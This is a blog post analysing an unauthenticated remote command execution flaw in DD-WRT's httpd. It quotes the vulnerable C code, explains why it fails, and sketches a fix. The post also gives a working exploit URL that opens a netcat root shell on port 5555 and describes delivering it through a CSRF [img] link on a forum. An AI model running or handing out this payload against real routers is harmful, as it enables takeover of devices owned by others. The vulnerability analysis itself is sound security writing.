DD-WRT's httpd service Remote Command Execution Vulnerability

Today I found a video demonstration of this vulnerability on YouTube. DD-WRT is free Linux-based firmware for several wireless routers, most notably the Linksys WRT54G (including the WRT54GL and WRT54GS). The bug works on the latest release of DD-WRT (v24 sp1). Thanks Leka vecher, who discovered this, I guess.

It looks pretty cool. Let's watch it first, and then I'd like to share with you a bit about this vulnerability.

This bug is located in the httpd.c file, around line 859.

// around line 859
// "file" is the request path straight from the URL; anything containing "cgi-bin" takes this branch
if (containsstring(file, "cgi-bin")) {

  auth_fail = 0;
  // the auth result is only recorded here; nothing stops the request yet
  if (!do_auth(conn_fp, auth_userid, auth_passwd, auth_realm, authorization, auth_check))
    auth_fail = 1;

// ......... (snip) ............

// around line 900
  }
  // the request path is interpolated, unquoted and unfiltered, into a shell script
  // that is run regardless of auth_fail; output is redirected to /tmp/shellout.asp
  exec = fopen("/tmp/exec.tmp", "wb");
  fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
  if (query)
    fprintf(exec, "/bin/sh %s/%s>/tmp/shellout.asp");

// ........... (snip) ..........

// around line 926
  // the 401 challenge is sent only now, after the command has already run
  if (auth_fail == 1) {
    send_authenticate(auth_realm);
    auth_fail = 0;
Three issues here:

  • No metacharacter handling
  • The command gets executed even without successful authentication. You are not going to see any output if you are not authenticated, though.
  • httpd runs as root
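As an added illustration (not DD-WRT's code), here is how the cgi-bin branch should have behaved against all three points above: reject any request path outside a strict allowlist, and refuse to build the shell script at all unless authentication has already succeeded. The function names, the buffer and the REQUEST_METHOD check are my own assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Allowlist for the request path: a relative path made of
 * [A-Za-z0-9._/-] only. Shell metacharacters, whitespace and '$'
 * (so $IFS) are refused, as is any ".." component. 1 = safe, 0 = unsafe. */
int cgi_path_is_safe(const char *file)
{
    const unsigned char *p;
    if (file == NULL || *file == '\0' || *file == '/' || strstr(file, "..") != NULL)
        return 0;
    for (p = (const unsigned char *)file; *p != '\0'; p++)
        if (!isalnum(*p) && strchr("._/-", *p) == NULL)
            return 0;
    return 1;
}

/* Build the script the page's code writes to /tmp/exec.tmp, but only
 * for an authenticated request whose method and path pass the checks.
 * The query string is deliberately not spliced into the command line;
 * it belongs in the CGI's environment (execve envp), not in a shell
 * script. Returns the script, or NULL if the request is refused. */
const char *build_cgi_exec(const char *method, const char *file, int auth_ok)
{
    static char script[512];
    int n;
    if (!auth_ok)                      /* check auth BEFORE doing anything */
        return NULL;
    if (strcmp(method, "GET") != 0 && strcmp(method, "POST") != 0)
        return NULL;                   /* method is interpolated too, so allowlist it */
    if (!cgi_path_is_safe(file))
        return NULL;
    n = snprintf(script, sizeof script,
                 "export REQUEST_METHOD=\"%s\"\n/bin/sh %s >/tmp/shellout.asp\n",
                 method, file);
    if (n < 0 || (size_t)n >= sizeof script)
        return NULL;
    return script;
}
```

Running httpd as an unprivileged user would still be needed to blunt the third point; the path filter and the ordering fix only address the first two.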

To sum up, any unauthenticated attacker who can reach the management web interface can easily get root on the device from a browser with a URL like:

http://routerIP/cgi-bin/;command_to_execute(whitespaces break it)

Whitespace breaks the URL, but it can easily be replaced with a shell variable such as $IFS. So, as the attack video demo showed, getting a root shell on 5555/tcp becomes as easy as typing this in your browser's URL bar:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh

Fortunately, httpd is not accessible from the public network by default. But as Leka mentioned:

this vulnerability can be exploited via a CSRF attack (the dd-wrt device's owner does not even need to have an authenticated session on the web UI, which is bad, bad). However, a basic authentication dialog will appear. In IE even this can be suppressed, see this one:

http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/

Unlike the already documented CSRF vulnerability (http://www.securityfocus.com/bid/32703), this DOES NOT need an authenticated session. This means someone can even post a crafted [img] link on a forum and a dd-wrt router owner visiting the forum will get owned :)

Alright, that's it. Be good, do right! :)

About Conan

Blogger, eager learner, open-source enthusiast; loves programming, design, photography and music. Areas of study: graphic design, web architecture, algorithms, network security, visual arts.